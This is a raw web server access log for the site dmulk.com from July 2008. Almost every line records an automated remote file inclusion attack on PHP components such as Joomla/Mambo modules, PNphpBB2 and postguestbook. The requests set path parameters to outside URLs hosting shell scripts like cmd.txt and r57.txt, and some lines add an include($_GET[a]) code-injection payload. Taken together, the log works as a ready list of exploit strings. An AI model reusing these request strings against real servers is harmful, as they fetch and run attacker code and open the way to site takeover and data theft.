85.234.133.173 - - [29/Jul/2008:09:42:24 -0700] "GET ///vwar/backup/errors.php?error=http://www.freewebtown.com/cupu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
222.35.3.83 - - [29/Jul/2008:09:42:29 -0700] "GET /logs/access_080218.log HTTP/1.1" 200 318720 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
202.174.82.199 - - [29/Jul/2008:09:42:36 -0700] "GET /com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.235.140.231 - - [29/Jul/2008:09:42:36 -0700] "GET /logs/access_080120.log HTTP/1.1" 200 421632 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
207.45.177.194 - - [29/Jul/2008:09:42:47 -0700] "GET /logs/access_080208.log//admin.php?cal_dir=http://artworkmarket.com/administrator/components/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:09:42:51 -0700] "GET /logs/access_080301.log/trans.php?trans=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.84.182.98 - - [29/Jul/2008:09:43:03 -0700] "GET /logs/access.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.182.98 - - [29/Jul/2008:09:43:03 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.182.98 - - [29/Jul/2008:09:43:03 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.118.110.139 - - [29/Jul/2008:09:43:08 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.ctocnet-socal.org/registration/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.130 - - [29/Jul/2008:09:43:13 -0700] "GET /logs/access.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.130 - - [29/Jul/2008:09:43:13 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.130 - - [29/Jul/2008:09:43:14 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.118.110.139 - - [29/Jul/2008:09:43:16 -0700] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.ctocnet-socal.org/registration/id2.txt?? HTTP/1.1" 200 18535 "-" "libwww-perl/5.803" "www.dmulk.com"
62.152.41.170 - - [29/Jul/2008:09:43:30 -0700] "GET /logs/access_080315.log/errors.php?error=http://shopsb.ru/THIEF/kiss/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.10.47.15 - - [29/Jul/2008:09:43:36 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
141.85.101.1 - - [29/Jul/2008:09:43:59 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.185.237.20 - - [29/Jul/2008:09:44:01 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://artworkmarket.com/administrator/components/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
74.6.17.183 - - [29/Jul/2008:09:44:04 -0700] "GET /logs/access_080212.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
65.98.70.18 - - [29/Jul/2008:09:44:17 -0700] "GET /logs/access_080218.log//modules/TotalCalendar/about.php?inc_dir=http://moisidis.gr/siteframe/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.98.70.18 - - [29/Jul/2008:09:44:17 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://moisidis.gr/siteframe/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.98.70.18 - - [29/Jul/2008:09:44:17 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://moisidis.gr/siteframe/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.251.162.130 - - [29/Jul/2008:09:44:19 -0700] "GET /logs/access.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.251.162.130 - - [29/Jul/2008:09:44:19 -0700] "GET /logs/access.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.251.162.130 - - [29/Jul/2008:09:44:20 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.251.162.130 - - [29/Jul/2008:09:44:20 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.251.162.130 - - [29/Jul/2008:09:44:22 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.251.162.130 - - [29/Jul/2008:09:44:22 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.11.67.242 - - [29/Jul/2008:09:44:26 -0700] "GET /logs/access.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [29/Jul/2008:09:44:26 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [29/Jul/2008:09:44:27 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.246.95.89 - - [29/Jul/2008:09:44:28 -0700] "GET /logs/access_080329.log/index2.php?content=http://lodossisland.free.fr/shoot/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.186.78.5 - - [29/Jul/2008:09:44:29 -0700] "GET /logs/access_080207.log%20//skin/zero_vote/ask_password.php?dir=http://67.223.229.149/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
83.246.95.89 - - [29/Jul/2008:09:44:29 -0700] "GET /index2.php?content=http://lodossisland.free.fr/shoot/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.246.95.89 - - [29/Jul/2008:09:44:29 -0700] "GET /logs/index2.php?content=http://lodossisland.free.fr/shoot/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.152.41.170 - - [29/Jul/2008:09:44:42 -0700] "GET /logs/access_080207.log/errors.php?error=http://shopsb.ru/THIEF/kiss/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.11.67.242 - - [29/Jul/2008:09:44:44 -0700] "GET /logs/access.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [29/Jul/2008:09:44:44 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [29/Jul/2008:09:44:44 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.8.104 - - [29/Jul/2008:09:44:51 -0700] "GET /blog/index.php/2008/?show=slide HTTP/1.0" 200 17245 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
85.234.133.173 - - [29/Jul/2008:09:44:51 -0700] "GET /?sourcedir=http://www.freewebtown.com/cupu/cmd.txt? HTTP/1.1" 200 18376 "-" "libwww-perl/5.811" "www.dmulk.com"
74.6.17.183 - - [29/Jul/2008:09:45:22 -0700] "GET /logs/ HTTP/1.0" 200 58265 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
83.246.95.89 - - [29/Jul/2008:09:45:22 -0700] "GET /logs/access_080222.log/services.php?page=http://lodossisland.free.fr/shoot/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.246.95.89 - - [29/Jul/2008:09:45:23 -0700] "GET /services.php?page=http://lodossisland.free.fr/shoot/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.246.95.89 - - [29/Jul/2008:09:45:24 -0700] "GET /logs/services.php?page=http://lodossisland.free.fr/shoot/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.246.95.89 - - [29/Jul/2008:09:45:24 -0700] "GET /logs/access_080222.log/services.php?page=http://lodossisland.free.fr/shoot/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.246.95.89 - - [29/Jul/2008:09:45:24 -0700] "GET /logs/access_080308.log/services.php?page=http://lodossisland.free.fr/shoot/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.246.95.89 - - [29/Jul/2008:09:45:25 -0700] "GET /services.php?page=http://lodossisland.free.fr/shoot/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.246.95.89 - - [29/Jul/2008:09:45:25 -0700] "GET /logs/services.php?page=http://lodossisland.free.fr/shoot/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.246.95.89 - - [29/Jul/2008:09:45:25 -0700] "GET /logs/access_080308.log/services.php?page=http://lodossisland.free.fr/shoot/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.119 - - [29/Jul/2008:09:45:45 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.67.119 - - [29/Jul/2008:09:45:46 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
207.210.115.114 - - [29/Jul/2008:09:45:51 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://growlibear.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
213.133.102.211 - - [29/Jul/2008:09:45:52 -0700] "GET /logs/access.log%20//index2.php?DOCUMENT_ROOT=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
74.6.8.104 - - [29/Jul/2008:09:45:53 -0700] "GET /blog/index.php/2008/?show=slide HTTP/1.0" 200 17245 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
207.210.115.114 - - [29/Jul/2008:09:45:54 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://growlibear.com/test.txt? HTTP/1.1" 200 3694 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.111.173.117 - - [29/Jul/2008:09:45:59 -0700] "GET /services.php?page=http://lodossisland.free.fr/shoot/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.14.123.10 - - [29/Jul/2008:09:45:59 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.45.177.194 - - [29/Jul/2008:09:46:01 -0700] "GET /logs/access_080322.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=add%20this? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
207.45.177.194 - - [29/Jul/2008:09:46:01 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=add%20this? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
207.45.177.194 - - [29/Jul/2008:09:46:02 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=add%20this? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.111.173.117 - - [29/Jul/2008:09:46:08 -0700] "GET /logs/access_080226.log/services.php?page=http://lodossisland.free.fr/shoot/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.117 - - [29/Jul/2008:09:46:09 -0700] "GET /services.php?page=http://lodossisland.free.fr/shoot/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.117 - - [29/Jul/2008:09:46:09 -0700] "GET /logs/services.php?page=http://lodossisland.free.fr/shoot/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.234.198.225 - - [29/Jul/2008:09:46:18 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.198.225 - - [29/Jul/2008:09:46:18 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
59.126.46.141 - - [29/Jul/2008:09:46:22 -0700] "GET /logs/index.php?site=http://growlibear.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
59.126.46.141 - - [29/Jul/2008:09:46:22 -0700] "GET /index.php?site=http://growlibear.com/test.txt? HTTP/1.1" 200 18377 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
195.22.94.70 - - [29/Jul/2008:09:46:32 -0700] "GET /logs/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.icamotorediciones.es/administrator/popups/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.246.95.89 - - [29/Jul/2008:09:46:32 -0700] "GET /services.php?page=http://lodossisland.free.fr/shoot/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.22.94.70 - - [29/Jul/2008:09:46:32 -0700] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.icamotorediciones.es/administrator/popups/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.246.95.89 - - [29/Jul/2008:09:46:33 -0700] "GET /services.php?page=http://lodossisland.free.fr/shoot/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.117 - - [29/Jul/2008:09:46:38 -0700] "GET /logs/access_080329.log/index2.php?content=http://lodossisland.free.fr/shoot/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.117 - - [29/Jul/2008:09:46:38 -0700] "GET /index2.php?content=http://lodossisland.free.fr/shoot/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.117 - - [29/Jul/2008:09:46:39 -0700] "GET /logs/index2.php?content=http://lodossisland.free.fr/shoot/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.117 - - [29/Jul/2008:09:46:49 -0700] "GET /logs/access_080205.log/services.php?page=http://lodossisland.free.fr/shoot/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.218.250.106 - - [29/Jul/2008:09:46:52 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
201.218.250.106 - - [29/Jul/2008:09:46:53 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.244.71.72 - - [29/Jul/2008:09:47:12 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.geocities.com/lujonies/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.244.71.72 - - [29/Jul/2008:09:47:12 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.geocities.com/lujonies/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.111.173.117 - - [29/Jul/2008:09:47:21 -0700] "GET /index2.php?content=http://lodossisland.free.fr/shoot/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.13.243.62 - - [29/Jul/2008:09:47:29 -0700] "GET /logs/access_080130.log HTTP/1.0" 200 196608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
83.246.95.89 - - [29/Jul/2008:09:47:54 -0700] "GET /index2.php?content=http://lodossisland.free.fr/shoot/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:09:47:56 -0700] "GET /logs/access.log/index.php?x=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:09:47:59 -0700] "GET /index.php?x=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 200 18427 "-" "libwww-perl/5.805" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:09:47:59 -0700] "GET /logs/index.php?x=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.120.115 - - [29/Jul/2008:09:48:00 -0700] "GET /logs/access_080315.log//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.kupc.org/zero/bbs//skin/zero_vote/ooid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.120.115 - - [29/Jul/2008:09:48:00 -0700] "GET //components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.kupc.org/zero/bbs//skin/zero_vote/ooid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.120.115 - - [29/Jul/2008:09:48:01 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.kupc.org/zero/bbs//skin/zero_vote/ooid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
83.246.95.89 - - [29/Jul/2008:09:48:06 -0700] "GET /index2.php?content=http://lodossisland.free.fr/shoot/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.10.47.15 - - [29/Jul/2008:09:48:23 -0700] "GET /logs/access_080211.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.47.15 - - [29/Jul/2008:09:48:23 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.47.15 - - [29/Jul/2008:09:48:23 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.47.15 - - [29/Jul/2008:09:48:24 -0700] "GET /logs/access_080228.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
141.85.101.1 - - [29/Jul/2008:09:48:30 -0700] "GET /logs/access_080211.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
141.85.101.1 - - [29/Jul/2008:09:48:30 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
141.85.101.1 - - [29/Jul/2008:09:48:31 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
141.85.101.1 - - [29/Jul/2008:09:48:31 -0700] "GET /logs/access_080228.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
12.196.98.16 - - [29/Jul/2008:09:48:32 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.abunaissa.de/ooid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
87.106.214.193 - - [29/Jul/2008:09:48:37 -0700] "GET /logs/access_080528.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.214.193 - - [29/Jul/2008:09:48:39 -0700] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 200 18589 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.214.193 - - [29/Jul/2008:09:48:40 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.84.182.98 - - [29/Jul/2008:09:48:47 -0700] "GET //extensions/moblog/moblog_lib.php?basedir=http://growlibear.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
70.84.182.98 - - [29/Jul/2008:09:48:47 -0700] "GET /logs//extensions/moblog/moblog_lib.php?basedir=http://growlibear.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
194.165.49.171 - - [29/Jul/2008:09:48:50 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.165.49.171 - - [29/Jul/2008:09:48:50 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:09:48:57 -0700] "GET /logs/access.log/index.php?x=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:09:48:59 -0700] "GET /index.php?x=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 200 18427 "-" "libwww-perl/5.805" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:09:49:00 -0700] "GET /logs/index.php?x=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.201.66 - - [29/Jul/2008:09:49:04 -0700] "GET /errors.php?error=http://www.latinamericancongress.com/imag_eventos/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.22.89.194 - - [29/Jul/2008:09:49:06 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 200 3694 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [29/Jul/2008:09:49:07 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [29/Jul/2008:09:49:07 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [29/Jul/2008:09:49:07 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 200 3694 "-" "libwww-perl/5.812" "www.dmulk.com"
62.152.41.170 - - [29/Jul/2008:09:49:14 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://shopsb.ru/THIEF/kiss/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.17.183 - - [29/Jul/2008:09:49:15 -0700] "GET /bikes/dteel/2008_01_27/?N=A HTTP/1.0" 200 5034 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.106.214.193 - - [29/Jul/2008:09:49:21 -0700] "GET /logs/access_080327.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.246.95.89 - - [29/Jul/2008:09:49:26 -0700] "GET /logs/services.php?page=http://lodossisland.free.fr/shoot/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.246.95.89 - - [29/Jul/2008:09:49:27 -0700] "GET /services.php?page=http://lodossisland.free.fr/shoot/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
